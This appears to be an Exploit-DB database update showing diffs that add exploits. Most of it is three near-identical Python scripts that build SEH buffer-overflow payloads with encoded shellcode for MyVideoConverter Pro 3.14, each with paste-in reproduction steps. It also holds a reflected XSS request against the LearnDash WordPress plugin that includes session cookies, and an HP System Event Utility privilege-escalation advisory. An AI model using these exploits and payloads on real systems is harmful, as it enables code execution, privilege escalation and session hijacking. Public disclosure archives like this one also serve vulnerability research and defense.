DB: 2020-02-13

11 changes to exploits/shellcodes

xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation

SunOS 5.10 Generic_147148-26 - Local Privilege Escalation
MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
HP System Event Utility - Local Privilege Escalation

exploits/php/webapps/48030.txt

@@ -20,6 +20,17 @@ Once the user is logged in to the WordPress website where the vulnerable LearnDa
 
 An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.
 
+GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1
+Host: learndashtesting.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://learndashtesting.com/my-account-2/
+Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685
+
 3. Timeline
 
 Vulnerability reported to the LearnDash team – January 14, 2020

exploits/windows/local/48054.py

@@ -0,0 +1,53 @@
+#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-11
+#Vendor Homepage : http://www.ivideogo.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
+#2. Just copy the text inside "Shell.txt".
+#3. Start the program. In the new window click "Add" > "Convert DVD" > "Movie" .
+#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 268
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x1004f3e3)
+#0x1004f3e3 : pop ebx # pop esi # ret  |  {PAGE_EXECUTE_READ} [mysubtitle.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("Shell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/48055.py

@@ -0,0 +1,53 @@
+#Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
+#Exploit Author : ZwX
+#Exploit Date: 2020-02-11
+#Vendor Homepage : http://www.ivideogo.com/
+#Tested on OS: Windows 10 v1803
+#Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "exploit.txt".
+#2. Just copy the text inside "exploit.txt".
+#3. Start the program. In the new window click "Options" > "Settins" .
+#4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..."
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 268
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x10045ebb)
+#0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/48056.py

@@ -0,0 +1,53 @@
+# Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
+# Exploit Author : ZwX
+# Exploit Date: 2020-02-11
+# Vendor Homepage : http://www.ivideogo.com/
+# Tested on OS: Windows 10 v1803
+# Social: twitter.com/ZwX2a
+
+
+## Steps to Reproduce: ##
+#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
+#2. Just copy the text inside "Shell.txt".
+#3. Start the program. In the new window click "Add" > "Convert DVD" > "TVSeries" .
+#4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..."
+#5. The calculator runs successfully
+
+
+#!/usr/bin/python 
+
+from struct import pack
+
+buffer = "\x41" * 268
+nseh = "\xeb\x06\xff\xff"
+seh = pack("<I",0x10039291)
+#0x10039291 : pop ecx # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [mysubtitle.dll]
+#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
+shellcode =  ""
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+payload = buffer + nseh + seh + shellcode
+try:
+    f=open("Shell.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/48057.txt

@@ -0,0 +1,83 @@
+# Exploit Title: HP System Event Utility - Local Privilege Escalation
+# Author: hyp3rlinx
+# Date: 2020-02-11
+# Vendor: www.hp.com
+# Link: https://hp-system-event-utility.en.lo4d.com/download
+# CVE: CVE-2019-18915
+
+
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.hp.com
+
+
+[Product]
+HP System Event Utility
+
+
+The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc.
+HP System Event Utility enables the functioning of special function keys on select HP devices.
+
+
+[Vulnerability Type]
+Local Privilege Escalation
+
+
+
+[CVE Reference]
+CVE-2019-18915
+
+
+
+[Security Issue]
+The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
+HPMSGSVC.exe runs a background process that delivers push notifications.
+
+The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe"
+if found in the users c:\ drive.
+
+Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe
+
+Two Handles are inherit, properties are Write/Read
+Name: \Device\ConDrv
+
+This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location
+and can be used to escalate privileges from Admin to SYSTEM.
+
+HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359
+
+
+[References]
+PSR-2019-0204
+https://support.hp.com/us-en/document/c06559359
+
+
+
+[Network Access]
+Local
+
+
+[Disclosure Timeline]
+Vendor Notification:  October 7, 2019
+HP PSRT "product team will address the issue in next release" : January 13, 2020
+HP advisory and mitigation release : February 10, 2020
+February 11, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -10607,7 +10607,7 @@ id,file,description,date,author,type,platform,port
 45915,exploits/linux/local/45915.rb,"Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,linux,
 45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos,
 45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows,
-45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd,
+45922,exploits/multiple/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,multiple,
 45938,exploits/aix/local/45938.pl,"Xorg X11 Server (AIX) - Local Privilege Escalation",2018-12-04,0xdono,local,aix,
 45953,exploits/unix/local/45953.rb,"Emacs - movemail Privilege Escalation (Metasploit)",2018-12-04,Metasploit,local,unix,
 45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple,
@@ -10923,7 +10923,7 @@ id,file,description,date,author,type,platform,port
 47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,
 47916,exploits/windows/local/47916.txt,"VPN unlimited 6.1 - Unquoted Service Path",2020-01-14,"Amin Rawah",local,windows,
-47932,exploits/multiple/local/47932.c,"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation",2020-01-16,"Marco Ivaldi",local,multiple,
+47932,exploits/solaris/local/47932.c,"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation",2020-01-16,"Marco Ivaldi",local,solaris,
 47933,exploits/windows/local/47933.rb,"Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate",2020-01-15,"Oliver Lyak",local,windows,
 47935,exploits/windows_x86-64/local/47935.cpp,"Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)",2020-01-07,bluefrostsec,local,windows_x86-64,
 47938,exploits/windows/local/47938.py,"Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)",2020-01-17,antonio,local,windows,
@@ -10953,6 +10953,10 @@ id,file,description,date,author,type,platform,port
 48049,exploits/windows/local/48049.txt,"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path",2020-02-11,boku,local,windows,
 48050,exploits/windows/local/48050.py,"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow",2020-02-11,ZwX,local,windows,
 48052,exploits/linux/local/48052.sh,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow",2020-02-06,"Dylan Katz",local,linux,
+48054,exploits/windows/local/48054.py,"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow",2020-02-12,ZwX,local,windows,
+48055,exploits/windows/local/48055.py,"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow",2020-02-12,ZwX,local,windows,
+48056,exploits/windows/local/48056.py,"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow",2020-02-12,ZwX,local,windows,
+48057,exploits/windows/local/48057.txt,"HP System Event Utility - Local Privilege Escalation",2020-02-12,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139